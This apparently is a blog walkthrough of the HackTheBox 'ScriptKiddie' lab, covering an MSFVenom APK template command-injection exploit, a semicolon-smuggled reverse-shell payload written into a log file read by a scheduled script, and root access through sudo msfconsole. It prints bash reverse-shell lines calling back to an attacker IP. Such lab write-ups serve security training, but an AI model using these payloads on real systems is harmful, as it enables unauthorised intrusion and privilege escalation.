HackTheBox — ScriptKiddie

0xEmbo
3 min readSep 12, 2021

--

As always, we start with nmap to discover open ports/services.

Nmap scan

nmap -sC -sV -oA scriptkiddie 10.10.10.234

We have two open ports 22/ssh , 5000/http. Lets enumerate http port.

HTTP Enumeration

Visiting 10.10.10.226:5000 we see that the web application uses three tools (Nmap, MSFVenom, Searchsploit).

The first thing i tried is injecting OS commands in each field but nothing worked. Next i did some googling for public exploits for these tools and found APK template command injection vulnerability in MSFVenom.

There’s a module in metasploit that exploits this vulnerability but lets use this python script from exploitdb instead.

Exploit: https://www.exploit-db.com/exploits/49491

Wee need to edit the payload variable in the script first.

payload = 'bash -c "/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1"'

Initial Foothold/User

Now lets run our netcat listener and run the exploit.

And we are on the box as kid user.

Lateral Movement

After some enumeration i found a script called scanlosers.sh inside pwn user home directory, we only have read permissions on it but i think the script is running regularly because the hackers file is cleared every few minutes. So lets understand the script to see how it works.

#!/bin/bash

log=/home/kid/logs/hackers

cd /home/pwn/
cat $log | cut -d' ' -f3- | sort -u | while read ip; do
    sh -c "nmap --top-ports 10 -oN recon/${ip}.nmap ${ip} 2>&1 >/dev/null" &
done

if [[ $(wc -l < $log) -gt 0 ]]; then echo -n > $log; fi

It reads the hackers file inside our home directory, and then it splits the string inside by a space and takes the third field (which is the IP address) and runs Nmap scan on it.

And we have read/write permissions on hackers file so we can edit the file to get OS command injection.

Payload: echo "field1 field2 ;bash -c '/bin/bash -i >& /dev/tcp/10.10.16.25/1337 0>&1' #" > hackers

field1 & field2 are just for the cut command so we can inject our payload in the third field. And “;” to break out of the sh command and “#” to comment the rest of the command.

The final step is to run a netcat listener and receive the reverse shell nc -nvlp 1337 .

Getting root

Running sudo -l we can run metasploit’s msfconsole as root without password.

Metasploit’s msfconsole allows you to execute system commands within the msfconsole itself

sudo /opt/metasploit-framework-6-0-9/msfconsole

And we are ROOT !

If you find it useful, kindly give me a respect

Linkedin | Github

Hackthebox
Htb
Hacking
Pentesting
Ctf

--

--

0xEmbo

Written by 0xEmbo

15 Followers

I am a Penetration Testing Enthusiast with computer science background, also interested in CTFs and python scripting.

More from 0xEmbo

See all from 0xEmbo

Recommended from Medium

Lists

Staff Picks

457 stories310 saves

Stories to Help You Level-Up at Work

19 stories229 saves

Self-Improvement 101

20 stories627 saves

Productivity 101

20 stories581 saves
See more recommendations

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams